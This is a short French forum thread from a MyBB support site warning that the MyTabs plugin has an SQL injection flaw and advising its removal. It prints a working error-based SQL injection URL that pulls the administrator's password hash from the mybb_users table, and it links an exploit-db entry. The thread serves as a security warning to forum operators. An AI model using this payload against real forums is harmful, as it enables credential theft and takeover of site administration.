MyBB.support, le portail francophone de MyBB

Version complète : MyTabs SQL Vulnerabilty
Vous consultez actuellement la version basse qualité d’un document. Voir la version complète avec le bon formatage.
Attention,


Le plugin mytabs possède une erreur SQL et on peut avoir accès à l’administration.

La seul solution est de supprimer le plugin.

Code :
http://localhost/forum/index.php?tab=1' and(select 1 from(select count(*),concat((select [b]password[/b] from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

http://www.exploit-db.com/exploits/17595/
Ouai j'avais dit a exdiogene et sa spyto , mais vu qu'il mon pas répondu ^^
 Utilitaire de traduction fourni par Regentronique  Utilitaire de traduction fourni par Regentronique